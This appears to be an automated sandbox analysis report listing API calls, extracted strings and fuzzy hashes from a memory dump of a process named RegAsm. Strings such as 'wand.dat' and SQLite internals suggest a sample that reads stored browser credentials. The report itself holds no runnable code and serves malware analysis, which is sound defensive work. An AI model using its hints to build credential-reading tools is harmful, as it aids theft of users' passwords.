                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                          Strings
                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                          • String ID: MS Sans Serif
                                                          APIs
                                                          • API ID: memcpy$memcmp
                                                          • String ID:
                                                          APIs
                                                          • API ID: memset$memcpy
                                                          • String ID:
                                                          APIs
                                                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                          • memcpy.MSVCRT ref: 0042EC7A
                                                          Strings
                                                          • sqlite_altertab_%s, xrefs: 0042EC4C
                                                          • Cannot add a column to a view, xrefs: 0042EBE8
                                                          • virtual tables may not be altered, xrefs: 0042EBD2
                                                          • API ID: memcpymemset
                                                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                          APIs
                                                          • memset.MSVCRT ref: 0040560C
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                          Strings
                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                          • String ID: *.*$dat$wand.dat
                                                          APIs
                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                          • wcslen.MSVCRT ref: 00410C74
                                                          • _wtoi.MSVCRT ref: 00410C80
                                                          • _wcsicmp.MSVCRT ref: 00410CCE
                                                          • _wcsicmp.MSVCRT ref: 00410CDF
                                                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                          • String ID:
                                                          • API String ID: 1549203181-0
                                                          APIs
                                                          • memset.MSVCRT ref: 00412057
                                                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                          • GetKeyState.USER32(00000010), ref: 0041210D
                                                          Similarity
                                                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                          • String ID:
                                                          • API String ID: 3550944819-0
                                                          APIs
                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                          • memcpy.MSVCRT ref: 0040A94F
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                          • String ID:
                                                          • API String ID: 3023356884-0
                                                          APIs
                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                          • memcpy.MSVCRT ref: 0040B248
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                          • String ID:
                                                          • API String ID: 3023356884-0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: @
                                                          • API String ID: 3510742995-2766056989
                                                          APIs
                                                          • strlen.MSVCRT ref: 0040B0D8
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                          • memcpy.MSVCRT ref: 0040B159
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                          • String ID:
                                                          • API String ID: 1171893557-0
                                                          APIs
                                                          • memset.MSVCRT ref: 004144E7
                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                          • memset.MSVCRT ref: 0041451A
                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                          Similarity
                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                          • String ID:
                                                          • API String ID: 1127616056-0
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                          • malloc.MSVCRT ref: 00417459
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                          • String ID:
                                                          • API String ID: 4284152360-0
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                          Similarity
                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                          • String ID:
                                                          • API String ID: 2678498856-0
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                          Similarity
                                                          • API ID: MessageSend$Item
                                                          • String ID:
                                                          • API String ID: 3888421826-0
                                                          APIs
                                                          • memset.MSVCRT ref: 00417B7B
                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                          Similarity
                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                          • String ID:
                                                          • API String ID: 3727323765-0
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                          • malloc.MSVCRT ref: 00417407
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                          • String ID:
                                                          • API String ID: 4284152360-0
                                                          APIs
                                                          • memset.MSVCRT ref: 0040F673
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                          • strlen.MSVCRT ref: 0040F6A2
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                          • String ID:
                                                          • API String ID: 2754987064-0
                                                          APIs
                                                          • memset.MSVCRT ref: 0040F6E2
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                          • strlen.MSVCRT ref: 0040F70D
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                          • String ID:
                                                          • API String ID: 2754987064-0
                                                          APIs
                                                          Strings
                                                          Similarity
                                                          • API ID: wcscpy$CloseHandle
                                                          • String ID: General
                                                          • API String ID: 3722638380-26480598
                                                          APIs
                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                          Similarity
                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                          • String ID:
                                                          • API String ID: 764393265-0
                                                          APIs
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                          Similarity
                                                          • API ID: Time$System$File$LocalSpecific
                                                          • String ID:
                                                          • API String ID: 979780441-0
                                                          APIs
                                                          • memcpy.MSVCRT ref: 004134E0
                                                          • memcpy.MSVCRT ref: 004134F2
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$DialogHandleModuleParam
                                                          • String ID:
                                                          • API String ID: 1386444988-0
                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                          APIs
                                                          • wcschr.MSVCRT ref: 0040F79E
                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcschr$memcpywcslen
                                                          • String ID: "
                                                          • API String ID: 1983396471-123907689
                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfmemcpy
                                                          • String ID: %2.2X
                                                          • API String ID: 2789212964-323797159
                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintf
                                                          • String ID: %%-%d.%ds
                                                          • API String ID: 3988819677-2008345750
                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                          APIs
                                                          • memset.MSVCRT ref: 0040E770
                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSendmemset
                                                          • String ID: F^@
                                                          • API String ID: 568519121-3652327722
                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PlacementWindowmemset
                                                          • String ID: WinPos
                                                          • API String ID: 4036792311-2823255486
                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                          APIs
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                          • String ID: _lng.ini
                                                          • API String ID: 383090722-1948609170
                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                          • API String ID: 2773794195-880857682
                                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID:
                                                          • API String ID: 438689982-0
                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$memset
                                                          • String ID:
                                                          • API String ID: 1860491036-0
                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                          APIs
                                                          • memcmp.MSVCRT ref: 00408AF3
                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                          • memcmp.MSVCRT ref: 00408B2B
                                                          • memcmp.MSVCRT ref: 00408B5C
                                                          • memcpy.MSVCRT ref: 00408B79
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmp$memcpy
                                                          • String ID:
                                                          • API String ID: 231171946-0
                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E